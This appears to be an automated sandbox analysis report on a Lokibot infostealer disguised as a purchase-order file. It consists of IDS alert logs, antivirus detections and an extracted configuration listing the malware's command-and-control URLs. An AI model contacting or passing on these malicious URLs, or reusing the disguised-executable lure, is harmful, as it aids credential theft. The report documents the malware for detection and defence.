2024-09-25T10:20:26.367186+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49790	188.114.97.3	80	TCP
2024-09-25T10:20:27.187595+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49791	188.114.97.3	80	TCP
2024-09-25T10:20:28.005117+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49792	188.114.97.3	80	TCP
2024-09-25T10:20:28.823348+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49793	188.114.97.3	80	TCP
2024-09-25T10:20:29.793057+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49794	188.114.97.3	80	TCP
2024-09-25T10:20:30.724248+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49795	188.114.97.3	80	TCP
2024-09-25T10:20:31.529840+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49796	188.114.97.3	80	TCP
2024-09-25T10:20:32.349270+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49797	188.114.97.3	80	TCP
2024-09-25T10:20:33.159073+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49798	188.114.97.3	80	TCP
2024-09-25T10:20:34.004751+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49799	188.114.97.3	80	TCP
2024-09-25T10:20:34.831696+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49800	188.114.97.3	80	TCP
2024-09-25T10:20:35.676731+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49801	188.114.97.3	80	TCP
2024-09-25T10:20:36.488105+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49802	188.114.97.3	80	TCP
2024-09-25T10:20:37.347438+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49803	188.114.97.3	80	TCP
2024-09-25T10:20:38.170705+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49804	188.114.97.3	80	TCP
2024-09-25T10:20:38.983344+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49805	188.114.97.3	80	TCP
2024-09-25T10:20:39.812510+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49806	188.114.97.3	80	TCP
2024-09-25T10:20:40.679656+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49807	188.114.97.3	80	TCP
2024-09-25T10:20:41.532089+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49808	188.114.97.3	80	TCP
2024-09-25T10:20:42.407099+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49809	188.114.97.3	80	TCP
2024-09-25T10:20:43.201046+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49810	188.114.97.3	80	TCP
2024-09-25T10:20:44.020697+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49811	188.114.97.3	80	TCP
2024-09-25T10:20:44.843940+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49812	188.114.97.3	80	TCP
2024-09-25T10:20:45.767835+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49813	188.114.97.3	80	TCP
2024-09-25T10:20:46.581998+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49814	188.114.97.3	80	TCP
2024-09-25T10:20:47.383984+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49815	188.114.97.3	80	TCP
2024-09-25T10:20:48.345316+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49816	188.114.97.3	80	TCP
2024-09-25T10:20:49.177011+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49817	188.114.97.3	80	TCP
2024-09-25T10:20:50.264754+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49818	188.114.97.3	80	TCP
2024-09-25T10:20:51.117098+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49819	188.114.97.3	80	TCP
2024-09-25T10:20:51.965926+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49820	188.114.97.3	80	TCP
2024-09-25T10:20:52.847890+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49821	188.114.97.3	80	TCP
2024-09-25T10:20:53.648400+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49822	188.114.97.3	80	TCP
2024-09-25T10:20:54.469239+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49823	188.114.97.3	80	TCP
2024-09-25T10:20:55.277763+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49824	188.114.97.3	80	TCP
2024-09-25T10:20:56.095548+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49825	188.114.97.3	80	TCP
2024-09-25T10:20:56.943672+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49826	188.114.97.3	80	TCP
2024-09-25T10:20:57.765117+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49827	188.114.97.3	80	TCP
2024-09-25T10:20:58.604735+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49828	188.114.97.3	80	TCP
2024-09-25T10:21:00.485716+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49829	188.114.97.3	80	TCP
2024-09-25T10:21:00.652378+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49830	188.114.97.3	80	TCP
2024-09-25T10:21:01.509563+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49831	188.114.97.3	80	TCP
2024-09-25T10:21:02.530015+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49832	188.114.97.3	80	TCP
2024-09-25T10:21:03.370905+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49833	188.114.97.3	80	TCP
2024-09-25T10:21:04.493818+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49834	188.114.97.3	80	TCP
2024-09-25T10:21:05.272946+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49835	188.114.97.3	80	TCP
2024-09-25T10:21:06.101214+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49836	188.114.97.3	80	TCP
2024-09-25T10:21:06.901425+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49837	188.114.97.3	80	TCP
2024-09-25T10:21:07.859251+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49838	188.114.97.3	80	TCP
2024-09-25T10:21:09.943417+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49839	188.114.97.3	80	TCP
2024-09-25T10:21:10.818081+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49840	188.114.97.3	80	TCP
2024-09-25T10:21:11.674440+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49841	188.114.97.3	80	TCP
2024-09-25T10:21:12.571148+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49842	188.114.97.3	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: (PO403810)_VOLEX_doc.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://alphastand.top/alien/fre.php	Avira URL Cloud: Label: phishing
Source: http://alphastand.trade/alien/fre.php	Avira URL Cloud: Label: malware
Source: http://alphastand.win/alien/fre.php	Avira URL Cloud: Label: phishing
Source: https://dddotx.shop/Mine/PWS/fre.php	Avira URL Cloud: Label: malware
Source: http://kbfvzoboss.bid/alien/fre.php	Avira URL Cloud: Label: phishing
Source: http://dddotx.shop/Mine/PWS/fre.php	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}

Multi AV Scanner detection for submitted file

Source: (PO403810)_VOLEX_doc.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: (PO403810)_VOLEX_doc.exe

Joe Sandbox ML: detected

Source: (PO403810)_VOLEX_doc.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: (PO403810)_VOLEX_doc.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: BATMAN.pdbxD source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1337291123.0000000005470000.00000004.08000000.00040000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336193818.00000000030C1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Sept10F.pdb source: (PO403810)_VOLEX_doc.exe
Source:	Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2589991317.00000000006E2000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: BATMAN.pdb source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1337291123.0000000005470000.00000004.08000000.00040000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336193818.00000000030C1000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

2_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49707 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49707 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49707 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49726 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49726 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49725 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49725 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49725 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49726 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49709 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49726 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49709 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49704 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49709 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49726 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49706 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49706 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49724 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49706 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49724 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49724 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49707 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49743 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49743 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49743 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49724 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49724 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49709 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49709 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49707 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49754 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49732 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49725 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49725 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49732 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49732 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49745 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49745 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49754 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49704 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49745 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49704 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49757 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49757 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49757 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49707
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49754 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49704 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49704 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49741 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49757 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49757 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49745 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49724
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49741 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49732 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49741 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49732 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49743 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49750 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49750 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49750 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49732
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49715 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49703 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49703 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49701 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49701 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49701 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49703 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49743 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49725
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49723 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49723 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49723 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49750 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49715 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49715 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49701 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49701 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49723 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49723 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49713 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49713 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49704
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49713 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49750 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49703 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49723
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49703 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49713 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49715 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49754 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49712 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49754 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49712 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49741 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49712 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49741 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49747 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49727 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49727 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49727 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49750
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49720 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49727 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49727 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49772 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49772 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49772 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49711 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49757
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49772 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49712 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49772 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49712 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49772
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49756 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49756 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49756 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49712
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49765 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49715 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49727
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49703
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49758 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49779 -> 188.114.97.3:80
